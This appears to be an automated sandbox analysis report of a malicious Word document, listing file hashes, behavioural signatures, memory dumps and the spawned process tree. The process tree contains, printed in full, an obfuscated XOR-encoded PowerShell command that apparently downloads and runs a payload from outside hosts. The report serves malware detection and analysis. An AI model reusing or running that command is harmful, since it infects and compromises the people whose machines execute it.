Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21-09-2024 04:24

General

  • Target

    ef100fbe3ad8f50c04282a843f9cacbb_JaffaCakes118.doc

  • Size

    91KB

  • MD5

    ef100fbe3ad8f50c04282a843f9cacbb

  • SHA1

    1408fa5acb5f4ce88f1e7199c0ac938245cd991f

  • SHA256

    db4d83b0c0bb6db59e60f99150ac7539b1a38e5459720592ce896f88ce08b48b

  • SHA512

    672f3ce8826fc56daaa975bccf27e1fbc65062a275a66b9205ded78d180c593b054a564aef16ab411a49789e834557b91fdeaa70573b6de2f6a795b350226e07

  • SSDEEP

    768:6+1rXkDfrE/S+1oJwxS0JoXRdvoj7cLz67Xu8UrsmMFzA8vOsK12Gdx7v89HdY5S:6+VXu4/S+aJwaXFIrFLvvbG/7qR

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ef100fbe3ad8f50c04282a843f9cacbb_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2052
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2996
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . ( $Env:coMsPEc[4,24,25]-JoIN'') ( "$(SV 'oFs' '' ) " +[STRing]((13 , 102,93,66 ,20 , 71 ,76 ,94,4, 70, 75,67 ,76,74, 93,9,103, 76 ,93, 7,126 ,76 , 75 ,106 ,69 ,64 ,76 , 71 ,93,18 ,13 , 113 ,77, 79,20 ,14 , 65,93,93, 89 ,19,6,6,94 , 94 , 94 ,7,90, 93 ,72,91,24 , 17, 78 , 92, 72, 91 , 77 ,64, 72 , 71,90 , 7,74 ,70 ,68,6, 76 ,109 ,28 ,109 , 104,68 ,104 , 16,6 ,105 , 65,93, 93 , 89 , 19 , 6, 6 , 94, 94 ,94,7, 90 , 93,76 , 69 ,69, 72,71 ,77,74 ,70 , 92 ,95, 76 , 91, 7,74,70, 68,6, 29 , 31 , 88 , 29, 79,93, 71, 76 ,6, 105, 65 , 93 , 93 ,89 , 19, 6 ,6,94, 94, 94 ,7,64, 71 , 93,76,91 ,79 ,64 ,77 , 4 , 69 , 64 , 75 , 76 , 91 , 93,80,7,74 , 70,68,6, 99, 99 , 111 , 28,109 ,83,24, 115 , 93,6 ,105 ,65 , 93, 93 ,89, 19,6,6,74,65, 64 , 64,91 , 90,7 ,74 , 70, 68,6, 127 ,64 , 25 ,76,115,101,101,89, 66, 6, 105 , 65 ,93, 93,89,19 ,6 ,6 ,94,94 , 94,7,77 ,72,90,69,76,77 , 90 ,7,74 , 70,68,6 , 75 ,126, 64 ,101 ,92,72 ,120, 6 ,14,7 ,122,89, 69 ,64,93 , 1, 14, 105 , 14, 0 ,18 ,13 ,68,65, 124 ,9 ,20, 9 ,14 ,30, 28 , 14, 18, 13,120, 83,72,20, 13,76 , 71, 95 ,19 ,93, 76 ,68 , 89,2 , 14 , 117 ,14 , 2 , 13,68 , 65,124 ,2 ,14 ,7, 76, 81,76 , 14,18, 79 , 70 ,91, 76 , 72,74 , 65, 1 ,13 , 93, 94, 75 ,9 ,64,71 ,9 ,13,113,77 , 79 ,0, 82 ,93,91, 80 ,82, 13, 102 ,93, 66, 7 , 109 , 70 , 94 , 71 , 69,70 , 72, 77 , 111 ,64 ,69 ,76 ,1 , 13 ,93 ,94 ,75 ,5,9 ,13,120 ,83,72, 0 , 18 ,122,93, 72 , 91, 93, 4,121, 91 ,70 , 74,76 , 90, 90 , 9, 13, 120, 83,72 , 18 , 75 ,91,76 ,72, 66 ,18, 84, 74 , 72, 93 ,74,65 , 82, 84 ,84) | % { [cHAr] ($_ -BXOr '0x29' ) } )+"$( seT 'oFs' ' ') " )
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2700

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      d0ca6c421cf55e8a8c47e69ad68f8a13

      SHA1

      2cec941a4858863a9cadad3b10acb0bb2a910d71

      SHA256

      2194ce3f6b06f7b243bf2913cd9cca3810fe7c3a4eca9897471357c0788e5678

      SHA512

      787f25eac216b2e1ce7011db5c47e9648efb0c3253db914184c30ebbba0524c047b7f21ee62765d1327c177948a78891fa053af5926668c48bff44a462269ac0

    • memory/2052-11-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2052-4-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2052-9-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2052-23-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2052-24-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2052-22-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2052-20-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2052-15-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2052-7-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2052-0-0x000000002F0D1000-0x000000002F0D2000-memory.dmp

      Filesize

      4KB

    • memory/2052-50-0x0000000070FFD000-0x0000000071008000-memory.dmp

      Filesize

      44KB

    • memory/2052-2-0x0000000070FFD000-0x0000000071008000-memory.dmp

      Filesize

      44KB

    • memory/2052-14-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2052-5-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2052-18-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2052-8-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2052-32-0x0000000070FFD000-0x0000000071008000-memory.dmp

      Filesize

      44KB

    • memory/2052-33-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2052-34-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2052-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2052-49-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2052-10-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB